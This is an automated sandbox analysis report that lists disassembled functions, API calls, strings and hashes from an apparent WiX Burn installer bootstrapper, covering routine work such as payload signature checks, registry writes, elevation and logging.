API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: f1807be4c57e6998c64f3574fe0d324e6ccc38643a29f33ec5e94421ebd7cac7
Instruction ID: 2c9c1900e9236b88193404a3ccb45188539793a9b18fdf5c04f641f577a40f52
Opcode Fuzzy Hash: f1807be4c57e6998c64f3574fe0d324e6ccc38643a29f33ec5e94421ebd7cac7
Instruction Fuzzy Hash: AB012633A41A3A63973056994C06AAF7A59FF01B71B0101A1BF14FE380EB989C0081E4

Function 008B69AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,008B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008B69BB
GetLastError.KERNEL32(?,008B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008B69C5
GetExitCodeThread.KERNEL32(00000001,00000000,?,008B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008B6A04
GetLastError.KERNEL32(?,008B6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008B6A0E

Strings

Failed to wait for cache thread to terminate., xrefs: 008B69F6
Failed to get cache thread exit code., xrefs: 008B6A3F
core.cpp, xrefs: 008B69EC, 008B6A35

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 215ae60e2a2805dcc27c25c4217c7733dad8d8258c10da669145d4f586fe4750
Instruction ID: c1d5c37e31424619276ac7cb179177ea5a7c033929dd9868e5513db1edf6ae32
Opcode Fuzzy Hash: 215ae60e2a2805dcc27c25c4217c7733dad8d8258c10da669145d4f586fe4750
Instruction Fuzzy Hash: D411567064425ABBEB109FA59D02BBE7AA8FF00711F204165BA14E9260FB39DA509654

Function 008BF7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008BF7EE
LeaveCriticalSection.KERNEL32(?), ref: 008BF8FB

Strings

UX requested unknown payload with id: %ls, xrefs: 008BF85A
user is active, cannot change user state., xrefs: 008BF808
Failed to set source path for payload., xrefs: 008BF88A
Failed to set source path for container., xrefs: 008BF8E0
UX denied while trying to set source on embedded payload: %ls, xrefs: 008BF870
UX requested unknown container with id: %ls, xrefs: 008BF8BA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: user is active, cannot change user state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: 5d4427387816817ca19584dcb78f3e6c1721765193b835fede2a6afa9c3ba2b6
Instruction ID: ea5601dcf92dfd8a7cd871497ce0338acad9efc9c2c0384f6b01eeabd5c8f807
Opcode Fuzzy Hash: 5d4427387816817ca19584dcb78f3e6c1721765193b835fede2a6afa9c3ba2b6
Instruction Fuzzy Hash: 4131E972A4065ABF8B219B58CC45DAB77ACFF057207158136FA14EB342DB79ED008791

Function 008A71FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 008A7210

Strings

Failed to format escape sequence., xrefs: 008A72AA
Failed to append characters., xrefs: 008A729C
Failed to copy string., xrefs: 008A72C4
Failed to allocate buffer for escaped string., xrefs: 008A7227
[]{}, xrefs: 008A723A
Failed to append escape sequence., xrefs: 008A72A3
[\%c], xrefs: 008A726F

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: f9ba5cf3f93eb0939125e93777c5890e313e3ba8759aef8771219a68a6bff069
Instruction ID: bb0ddb5ffa0b8ec7a894372c9c0176b5b4f8f479e38577f654c3db74ef855c83
Opcode Fuzzy Hash: f9ba5cf3f93eb0939125e93777c5890e313e3ba8759aef8771219a68a6bff069
Instruction Fuzzy Hash: 9D21F532D4865ABAEF2156988C46FAE77A9FF13725F200011F902F6580DFB49E01A2D1

Function 008C5BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,008EB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,008C67DE,?,00000001,?,008EB4A0), ref: 008C5C45

Strings

Failed grow array of ordered patches., xrefs: 008C5CDE
Failed to plan action for target product., xrefs: 008C5CF0
Failed to insert execute action., xrefs: 008C5C9A
feclient.dll, xrefs: 008C5C3B, 008C5D65
Failed to copy target product code., xrefs: 008C5D78

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: eadd3062746e2812a93a11109537de37d79dec71853ef6abb1eb8662b2bb9e9a
Instruction ID: 8ba3549517944e4acf9046e6d5af80b29320d3a65b46b7f82ebcb05810480245
Opcode Fuzzy Hash: eadd3062746e2812a93a11109537de37d79dec71853ef6abb1eb8662b2bb9e9a
Instruction Fuzzy Hash: F08100B560074A9FCF14CF58C880EAA77B5FF08324B118669ED2A9B352D770ED91CB90

Function 008DCAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008DD262,00000000,00000000,00000000,00000000,00000000,008D2F1D), ref: 008DCB2F
__fassign.LIBCMT ref: 008DCBAA
__fassign.LIBCMT ref: 008DCBC5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008DCBEB
WriteFile.KERNEL32(?,00000000,00000000,008DD262,00000000,?,?,?,?,?,?,?,?,?,008DD262,00000000), ref: 008DCC0A
WriteFile.KERNEL32(?,00000000,00000001,008DD262,00000000,?,?,?,?,?,?,?,?,?,008DD262,00000000), ref: 008DCC43

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e5cea92d68cf92f5d14f6d101e6d30ef67ac720b9722bf4a55969b7c48a72aea
Instruction ID: 557dc7ef7607c3ff41ebf51f587db93a47982cfed16874fba78567ec7daa9892
Opcode Fuzzy Hash: e5cea92d68cf92f5d14f6d101e6d30ef67ac720b9722bf4a55969b7c48a72aea
Instruction Fuzzy Hash: D4518E71A1024A9FDB10CFA9D885AEEBBF8FF09310F14425BEA55E7351E7309941CBA1

Function 008C9279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,008B7113,000000B8,0000001C,00000100), ref: 008C92A4
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,008EB4B8,000000FF,?,?,?,008B7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 008C932E

Strings

BA aborted detect forward compatible bundle., xrefs: 008C9398
Failed to initialize update bundle., xrefs: 008C93D1
comres.dll, xrefs: 008C93B0
detect.cpp, xrefs: 008C938E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: b6f89aad56ae7c2c1de219920818d0ad182042b2ebb168e64aebcc22e1bd3603
Instruction ID: 51b82dc85e3c8d05c104eb2507e4d863acc5038e308e3d9e68ca8977df4b8b9a
Opcode Fuzzy Hash: b6f89aad56ae7c2c1de219920818d0ad182042b2ebb168e64aebcc22e1bd3603
Instruction Fuzzy Hash: 2851C071200205BBDF159F68CC89FAAB77AFF05310F1442ADF968DA2A1C771E860DB91

Function 008BAB9E Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(008A5479,000000FF,00AAC56B,E9008EBA,008A53BD,00000000,?,E9008EBA,00000000), ref: 008BAC94
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,008A5479,000000FF,00AAC56B,E9008EBA,008A53BD,00000000,?,E9008EBA,00000000), ref: 008BACD8

Strings

Failed authenticode verification of payload: %ls, xrefs: 008BAC75
Failed to get signer chain from authenticode certificate., xrefs: 008BAD06
Failed to get provider state from authenticode certificate., xrefs: 008BACC2
Failed to verify expected payload against actual certificate chain., xrefs: 008BAD1E
cache.cpp, xrefs: 008BAC6A, 008BACB8, 008BACFC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
API String ID: 1452528299-2590768268
Opcode ID: 62c5af95d76434472d09f432d37ef75c2519fcbc6d4d4dd94f261c587237af5a
Instruction ID: caf0455f754026c2c594b110e8af8908e9f0eb2fec7b633981f97d5300e15c23
Opcode Fuzzy Hash: 62c5af95d76434472d09f432d37ef75c2519fcbc6d4d4dd94f261c587237af5a
Instruction Fuzzy Hash: 09419972D01629A7DB159B98DC45AEEBBB8FF04720F010229FD11F7341E7755D048AE2

Function 008E02F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 008E033C
GetComputerNameW.KERNEL32(?,?), ref: 008E0394

Strings

Computer : %ls, xrefs: 008E0402
=== Logging started: %ls ===, xrefs: 008E03BF
--- logging level: %hs ---, xrefs: 008E0454
Executable: %ls v%d.%d.%d.%d, xrefs: 008E03F0

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 2577110986-3153207428
Opcode ID: fa9c37aab94c71f7dccb12e984cde4b6e34b3b96be25e89e165eb81c9b396734
Instruction ID: 8e1c11e40c4e3134fc7e85f9815a6e8798d96516b42aded481f2fbfc39168c3b
Opcode Fuzzy Hash: fa9c37aab94c71f7dccb12e984cde4b6e34b3b96be25e89e165eb81c9b396734
Instruction Fuzzy Hash: CB4183F2D041589FCB10DF69DD45AAA73BCFB45308F4085AAFA09E3142D6709EC48FA5

Function 008BD437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,008EB500,?,00000001,000000FF,?,?,7694B390,00000000,00000001,00000000,?,008B74E6), ref: 008BD560

Strings

Failed to create pipe name and client token., xrefs: 008BD4A1
elevation.cpp, xrefs: 008BD46B
Failed to create pipe and cache pipe., xrefs: 008BD4BD
Failed to elevate., xrefs: 008BD542
UX aborted elevation requirement., xrefs: 008BD475
Failed to connect to elevated child process., xrefs: 008BD549

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 248275563543d0d6819825a926d9d2087edadb6397bc116aea67dae933feee9f
Instruction ID: 2643aaf6800d190ca3c20eee14aefdb33815a157c304abf5c51cca877373c6b5
Opcode Fuzzy Hash: 248275563543d0d6819825a926d9d2087edadb6397bc116aea67dae933feee9f
Instruction Fuzzy Hash: BA313B7264472A7AF7259668CC43FFA775CFF01734F104215FA04EA382EA65AD4086D6

Function 008BD24B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,008BAD40,?,00000000,00000000), ref: 008BD2E9
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008BD2F5

Part of subcall function 008BCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,008BD365,00000000,?,?,008BC7C9,00000001,?,?,?,?,?), ref: 008BCF37
Part of subcall function 008BCF25: GetLastError.KERNEL32(?,?,008BD365,00000000,?,?,008BC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 008BCF41

CloseHandle.KERNEL32(00000000,00000000,?,?,008BC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 008BD376

Strings

Failed to create elevated cache thread., xrefs: 008BD323
elevation.cpp, xrefs: 008BD319
Failed to pump messages in child process., xrefs: 008BD34D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
API String ID: 3606931770-4134175193
Opcode ID: 21a633ce7a2329c782b8f282a44f0ddb23d568d2eb2095c45162eaddf9f011d6
Instruction ID: dce0b3fda0138f35ce8a7ba2fca499f6ab6d1d77706c154161aa62cad286baaa
Opcode Fuzzy Hash: 21a633ce7a2329c782b8f282a44f0ddb23d568d2eb2095c45162eaddf9f011d6
Instruction Fuzzy Hash: 8E41E3B6D01219AFDB15DFA9D8859EEBBF8FF08710F10416AF918E7340E774A9008B95

Function 008E159E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 117stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 008E15DA
lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008E163C
lstrlenW.KERNEL32(?), ref: 008E1648
RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 008E168B

Strings

BundleUpgradeCode, xrefs: 008E15A7
regutil.cpp, xrefs: 008E16B3

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: 0276cd92d2b294770e64aa33f12de33b7a9564c37375b30e7ab6999cf7b529ef
Instruction ID: 0fd769034d3566044c902d8a9c3d45cd0af1ba875a10cdd8946f381ba486d80e
Opcode Fuzzy Hash: 0276cd92d2b294770e64aa33f12de33b7a9564c37375b30e7ab6999cf7b529ef
Instruction Fuzzy Hash: EE41517290026AAFDF119F998C89AAEBBB8FF55750F050165FD11EB220D730DD119BA0

Function 008E0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0090B5FC,00000000,?,?,?,008B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008A54FA,?), ref: 008E0533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,0090B5F4,?,008B4207,00000000,Setup), ref: 008E05D7
GetLastError.KERNEL32(?,008B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008A54FA,?,?,?), ref: 008E05E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,008B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008A54FA,?), ref: 008E0621

Part of subcall function 008A2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 008A2F09

LeaveCriticalSection.KERNEL32(0090B5FC,?,?,0090B5F4,?,008B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008A54FA,?), ref: 008E067A

Strings

logutil.cpp, xrefs: 008E0606

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: fb7e1eef53562f36e30992c3aaec4d69bfc077511e55f9f9ba1e2343628f725c
Instruction ID: 84159c056d2d6bfd2d2472517129a18774699aad2391303278edef3144f21d58
Opcode Fuzzy Hash: fb7e1eef53562f36e30992c3aaec4d69bfc077511e55f9f9ba1e2343628f725c
Instruction Fuzzy Hash: 6A31E37190039AFFDB215F669D85F5E7668FB51758B000564FA00EA171D7B0CCA09FA0

Function 008C398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 008C39F4

Strings

Failed to format property value., xrefs: 008C3A7D
%s%="%s", xrefs: 008C3A27
Failed to escape string., xrefs: 008C3A76
Failed to format property string part., xrefs: 008C3A6F
Failed to append property string part., xrefs: 008C3A68

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 8bc5151a0269c2e97e7b31bdfdd92288fb8fb93557a845a9665a7090c618357e
Instruction ID: 24eed1df6bb2a01e203151bf3654d4319db3cdb5fb30bfd991d0aa8388afaa70
Opcode Fuzzy Hash: 8bc5151a0269c2e97e7b31bdfdd92288fb8fb93557a845a9665a7090c618357e
Instruction Fuzzy Hash: 8131BD3290022AABDB159E98DC42FAEBB78FB01704F10826EF911E2251D770DF25DB91

Function 008E41E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,008E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,008BA063,00000001), ref: 008E4203
GetLastError.KERNEL32(00000002,?,008E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,008BA063,00000001,000007D0,00000001,00000001,00000003), ref: 008E4212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,008E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,008BA063,00000001), ref: 008E42A6
GetLastError.KERNEL32(?,008E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,008BA063,00000001,000007D0,00000001), ref: 008E42B0

Part of subcall function 008E4440: FindFirstFileW.KERNEL32(008C923A,?,00000100,00000000,00000000), ref: 008E447B
Part of subcall function 008E4440: FindClose.KERNEL32(00000000), ref: 008E4487

Strings

\, xrefs: 008E4265
fileutil.cpp, xrefs: 008E42CF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: fec257f41e5bd002529153717717a649fc16d055e6cc5a8c0f254702f7a0c511
Instruction ID: 8e3a9f8a26c25f2cc3dc79da0259bd024facf202664917248f29113253ce0953
Opcode Fuzzy Hash: fec257f41e5bd002529153717717a649fc16d055e6cc5a8c0f254702f7a0c511
Instruction Fuzzy Hash: 3B31E336A052AAABDF215F9BCC40A6F7669FF53764B119029FE1CEB254D3708C4086D0

Function 008A732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,008A5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 008A733E
LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,008A5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 008A741D

Strings

Failed to get variable: %ls, xrefs: 008A737F
*****, xrefs: 008A73D9, 008A73E6
Failed to get value as string for variable: %ls, xrefs: 008A740C
Failed to format value '%ls' of variable: %ls, xrefs: 008A73E7
Failed to get unformatted string., xrefs: 008A73AE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 65796cc32e10508f1c78a843c6e215a9a61d579aacc894323492bcabf0061b1b
Instruction ID: c9bb764d24c4af277998d5a1d6bc4ffa1b14957d5d3f1a9a16af96ea526068af
Opcode Fuzzy Hash: 65796cc32e10508f1c78a843c6e215a9a61d579aacc894323492bcabf0061b1b
Instruction Fuzzy Hash: 3A31E23290565AFBEF225F44CC05BAE7B64FF16321F014125FD10EAA10D376EA90ABD5

